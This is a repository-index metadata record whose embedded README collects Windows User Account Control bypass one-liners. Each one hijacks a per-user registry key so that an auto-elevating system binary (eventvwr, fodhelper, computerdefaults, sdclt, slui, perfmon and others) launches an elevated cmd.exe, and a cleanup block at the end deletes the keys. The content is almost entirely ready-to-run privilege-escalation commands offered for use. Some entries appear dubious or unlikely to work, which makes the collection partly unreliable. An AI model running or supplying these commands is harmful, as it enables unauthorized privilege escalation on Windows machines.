{"id":19206679,"url":"https://github.com/blue0x1/uac-bypass-oneliners","last_synced_at":"2025-02-23T06:42:16.372Z","repository":{"id":197702300,"uuid":"699108482","full_name":"blue0x1/uac-bypass-oneliners","owner":"blue0x1","description":"Collection of one-liners to bypass User Account Control (UAC) in Windows. These techniques exploit certain behavior in Windows applications to elevate privileges.","archived":false,"fork":false,"pushed_at":"2023-10-02T11:22:29.000Z","size":6,"stargazers_count":85,"open_issues_count":2,"forks_count":10,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-01-04T15:30:08.671Z","etag":null,"topics":["uac","uac-bypass","uacbypass"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/blue0x1.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-10-01T23:47:28.000Z","updated_at":"2024-11-13T18:10:28.000Z","dependencies_parsed_at":null,"dependency_job_id":"850b3457-6eb8-4c3a-9dc2-38c8d3873dcf","html_url":"https://github.com/blue0x1/uac-bypass-oneliners","commit_stats":null,"previous_names":["blue0x1/uac-bypass-oneliners"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blue0x1%2Fuac-bypass-oneliners","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blue0x1%2Fuac-bypass-oneliners/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blue0x1%2Fuac-bypass-oneliners/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blue0x1%2Fuac-bypass-oneliners/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/blue0x1","download_url":"https://codeload.github.com/blue0x1/uac-bypass-oneliners/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":240280824,"owners_count":19776414,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["uac","uac-bypass","uacbypass"],"created_at":"2024-11-09T13:16:37.190Z","updated_at":"2025-02-23T06:42:16.311Z","avatar_url":"https://github.com/blue0x1.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# uac-bypass-oneliners\n\nCollection of one-liners to bypass User Account Control (UAC) in Windows. These techniques exploit certain behavior in Windows applications to elevate privileges.\n\nTechniques\n\u003cbr\u003e\nUsing eventvwr.exe: \u003cbr\u003e \u003cbr\u003e\n\n```\n\nreg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /v DelegateExecute /t REG_SZ /d \"\" /f \u0026\u0026 reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_SZ /d \"cmd /c start cmd\" /f \u0026\u0026 eventvwr.exe\n```\n\u003cbr\u003e\nUsing fodhelper.exe: \u003cbr\u003e \u003cbr\u003e\n\n```\n\nreg add HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command /f /ve /t REG_SZ /d \"cmd.exe\" \u0026\u0026 start fodhelper.exe\n\n```\n\n\nUsing computerdefaults.exe:\u003cbr\u003e \u003cbr\u003e\n\n```\n\nreg add HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command /v DelegateExecute /t REG_SZ /d \"\" /f \u0026\u0026 reg add HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command /ve /t REG_SZ /d \"cmd.exe\" /f \u0026\u0026 start computerdefaults.exe\n```\nUsing sdclt.exe:\u003cbr\u003e \u003cbr\u003e\n\n```\n\nreg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe /ve /t REG_SZ /d \"cmd.exe\" /f \u0026\u0026 start sdclt.exe\n```\n\u003cbr\u003e\nUsing slui.exe:\u003cbr\u003e \u003cbr\u003e\n\n```\n\nreg add HKCU\\Software\\Classes\\exefile\\shell\\open\\command /ve /t REG_SZ /d \"cmd.exe\" /f \u0026\u0026 reg add HKCU\\Software\\Classes\\exefile\\shell\\open\\command /v DelegateExecute /f \u0026\u0026 start slui.exe\n```\n\n\u003cbr\u003e\nUsing perfmon.exe: \u003cbr\u003e \u003cbr\u003e\n\n```\n\nreg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /v DelegateExecute /t REG_SZ /d \"\" /f \u0026\u0026 reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_SZ /d \"cmd /c start cmd\" /f \u0026\u0026 start perfmon.exe\n```\n\nUsing taskmgr.exe: \u003cbr\u003e\u003cbr\u003e\n\n\n```\nreg add HKCU\\Software\\Classes\\taskmgr\\shell\\open\\command /ve /t REG_SZ /d \"cmd.exe\" /f \u0026\u0026 start taskmgr.exe\n```\n\nUsing ComputerDefaults.exe: \u003cbr\u003e\u003cbr\u003e\n```\nreg add HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command /ve /t REG_SZ /d \"cmd.exe\" /f \u0026\u0026 reg add HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command /v DelegateExecute /t REG_SZ /d \"\" /f \u0026\u0026 start computerdefaults.exe\n```\n\nUsing sysprep.exe:\n\n```\n\nreg add HKCU\\Software\\Classes\\AppID\\{921C1A8B-9F15-4DA4-9235-0472C3A216E6} /f /ve /t REG_SZ /d \"cmd.exe\" \u0026\u0026 start C:\\Windows\\System32\\sysprep\\sysprep.exe\n```\n\nUsing control.exe with /computername:\n\n```\n\ncmd /c reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe\" /ve /d \"cmd.exe\" /f \u0026\u0026 control.exe /computername\n\n```\n\n\u003cb\u003eReset\u003c/b\u003e:\n\n```\nreg delete \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /f\nreg delete \"HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command\" /f\nreg delete \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe\" /f\nreg delete \"HKCU\\Software\\Classes\\exefile\\shell\\open\\command\" /f\nreg delete \"HKCU\\Software\\Classes\\taskmgr\\shell\\open\\command\" /f\nreg delete \"HKCU\\Software\\Classes\\AppID{921C1A8B-9F15-4DA4-9235-0472C3A216E6}\" /f\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fblue0x1%2Fuac-bypass-oneliners","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fblue0x1%2Fuac-bypass-oneliners","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fblue0x1%2Fuac-bypass-oneliners/lists"}